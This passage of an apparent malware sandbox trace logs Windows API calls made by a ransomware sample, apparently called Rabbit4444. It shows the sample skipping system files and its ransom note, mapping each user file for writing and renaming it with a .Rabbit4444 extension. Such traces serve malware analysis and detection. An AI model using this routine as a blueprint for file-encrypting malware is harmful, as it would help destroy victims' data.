lstrcmpiW (lpString1="640f", lpString2=".sys") returned 1 [0071.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.245] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.245] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16255604707) returned 1 [0071.245] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16775) returned 1 [0071.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0071.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0071.245] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4490, lpName=0x0) returned 0x27c [0071.246] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4490) returned 0x70000 [0071.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110df8 [0071.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0071.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110df8 | out: hHeap=0xe0000) returned 1 [0071.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0071.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0071.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0071.249] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16256004762) returned 1 [0071.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0071.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0071.249] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.250] CloseHandle (hObject=0x27c) returned 1 [0071.250] CloseHandle (hObject=0x260) returned 1 [0071.250] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f.Rabbit4444") returned 187 [0071.250] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0f7bdecdd8effd2ad7ef6c564929cf20e8f2d03ac1c05a9c48a1e218820f640f.rabbit4444"), dwFlags=0x1) returned 1 [0071.251] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7cfd23c, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xb7cfd23c, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xb819b5fa, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x48aad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", cAlternateFileName="108EF4~1")) returned 1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="Rabbit4444.exe") returned -1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2=".") returned 1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="..") returned 1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="windows") returned -1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="bootmgr") returned -1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="pagefile.sys") returned -1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="boot") returned -1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="ids.txt") returned -1 [0071.251] lstrcmpiW (lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", lpString2="NTUSER.DAT") returned -1 [0071.251] lstrcpyW (in: lpString1=0x130ec18, lpString2="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674" | out: lpString1="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674") returned="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674" [0071.251] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674", dwFileAttributes=0x0) returned 1 [0071.252] lstrlenW (lpString="108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674") returned 64 [0071.252] lstrlenW (lpString="Rabbit4444") returned 10 [0071.252] lstrcmpiW (lpString1="053aa12674", lpString2="Rabbit4444") returned -1 [0071.252] lstrlenW (lpString=".dll") returned 4 [0071.252] lstrcmpiW (lpString1="2674", lpString2=".dll") returned 1 [0071.252] lstrlenW (lpString=".lnk") returned 4 [0071.252] lstrcmpiW (lpString1="2674", lpString2=".lnk") returned 1 [0071.252] lstrlenW (lpString=".ini") returned 4 [0071.252] lstrcmpiW (lpString1="2674", lpString2=".ini") returned 1 [0071.252] lstrlenW (lpString=".sys") returned 4 [0071.252] lstrcmpiW (lpString1="2674", lpString2=".sys") returned 1 [0071.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.253] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.253] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16256333197) returned 1 [0071.253] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=297645) returned 1 [0071.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0071.253] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0071.253] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x48db0, lpName=0x0) returned 0x27c [0071.257] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x48db0) returned 0x70000 [0071.268] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x111008 [0071.268] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0071.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x111008 | out: hHeap=0xe0000) returned 1 [0071.268] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0071.268] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0071.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0071.268] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16257891424) returned 1 [0071.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0071.268] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0071.268] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.271] CloseHandle (hObject=0x27c) returned 1 [0071.271] CloseHandle (hObject=0x260) returned 1 [0071.271] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674.Rabbit4444") returned 187 [0071.271] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\108ef49f1d2ca8f76e1ea72ec8b4c7027cad10e58025ff3e090316053aa12674.rabbit4444"), dwFlags=0x1) returned 1 [0071.272] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba15b18c, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xba15b18c, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xba28c391, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x2f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", cAlternateFileName="170D12~1")) returned 1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="Rabbit4444.exe") returned -1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2=".") returned 1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="..") returned 1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="windows") returned -1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="bootmgr") returned -1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="pagefile.sys") returned -1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="boot") returned -1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="ids.txt") returned -1 [0071.272] lstrcmpiW (lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", lpString2="NTUSER.DAT") returned -1 [0071.272] lstrcpyW (in: lpString1=0x130ec18, lpString2="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae" | out: lpString1="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae") returned="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae" [0071.272] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae", dwFileAttributes=0x0) returned 1 [0071.273] lstrlenW (lpString="170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae") returned 64 [0071.273] lstrlenW (lpString="Rabbit4444") returned 10 [0071.273] lstrcmpiW (lpString1="9a768db3ae", lpString2="Rabbit4444") returned -1 [0071.273] lstrlenW (lpString=".dll") returned 4 [0071.273] lstrcmpiW (lpString1="b3ae", lpString2=".dll") returned 1 [0071.273] lstrlenW (lpString=".lnk") returned 4 [0071.273] lstrcmpiW (lpString1="b3ae", lpString2=".lnk") returned 1 [0071.273] lstrlenW (lpString=".ini") returned 4 [0071.273] lstrcmpiW (lpString1="b3ae", lpString2=".ini") returned 1 [0071.273] lstrlenW (lpString=".sys") returned 4 [0071.273] lstrcmpiW (lpString1="b3ae", lpString2=".sys") returned 1 [0071.273] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.274] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.274] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16258455731) returned 1 [0071.274] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=755) returned 1 [0071.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0071.274] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0071.274] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x600, lpName=0x0) returned 0x27c [0071.275] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x600) returned 0x70000 [0071.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1103a8 [0071.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0071.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1103a8 | out: hHeap=0xe0000) returned 1 [0071.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0071.277] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0071.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0071.277] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16258804404) returned 1 [0071.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0071.277] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0071.277] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.277] CloseHandle (hObject=0x27c) returned 1 [0071.278] CloseHandle (hObject=0x260) returned 1 [0071.278] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae.Rabbit4444") returned 187 [0071.278] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\170d1221afa47b91468a0f4c33f7ee970cbd516d9cd47671450d629a768db3ae.rabbit4444"), dwFlags=0x1) returned 1 [0071.278] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89388662, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x89388662, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x897daaa5, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x780ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", cAlternateFileName="189C80~1")) returned 1 [0071.278] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="Rabbit4444.exe") returned -1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2=".") returned 1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="..") returned 1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="windows") returned -1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="bootmgr") returned -1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="pagefile.sys") returned -1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="boot") returned -1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="ids.txt") returned -1 [0071.279] lstrcmpiW (lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", lpString2="NTUSER.DAT") returned -1 [0071.279] lstrcpyW (in: lpString1=0x130ec18, lpString2="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2" | out: lpString1="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2") returned="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2" [0071.279] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2", dwFileAttributes=0x0) returned 1 [0071.279] lstrlenW (lpString="189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2") returned 64 [0071.280] lstrlenW (lpString="Rabbit4444") returned 10 [0071.280] lstrcmpiW (lpString1="cacc3ca9a2", lpString2="Rabbit4444") returned -1 [0071.280] lstrlenW (lpString=".dll") returned 4 [0071.280] lstrcmpiW (lpString1="a9a2", lpString2=".dll") returned 1 [0071.280] lstrlenW (lpString=".lnk") returned 4 [0071.280] lstrcmpiW (lpString1="a9a2", lpString2=".lnk") returned 1 [0071.280] lstrlenW (lpString=".ini") returned 4 [0071.280] lstrcmpiW (lpString1="a9a2", lpString2=".ini") returned 1 [0071.280] lstrlenW (lpString=".sys") returned 4 [0071.280] lstrcmpiW (lpString1="a9a2", lpString2=".sys") returned 1 [0071.280] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.280] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.280] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16259097504) returned 1 [0071.280] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=491754) returned 1 [0071.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0071.280] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0071.280] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x783f0, lpName=0x0) returned 0x27c [0071.281] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x783f0) returned 0x2b0000 [0071.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x1109d8 [0071.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1109d8 | out: hHeap=0xe0000) returned 1 [0071.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0071.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0071.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.297] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16260811664) returned 1 [0071.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0071.297] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0071.297] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0071.302] CloseHandle (hObject=0x27c) returned 1 [0071.302] CloseHandle (hObject=0x260) returned 1 [0071.302] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2.Rabbit4444") returned 187 [0071.302] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\189c80ffd609217fe38db47e512df6a2484b81fc39e624bd634b78cacc3ca9a2" (normalized: 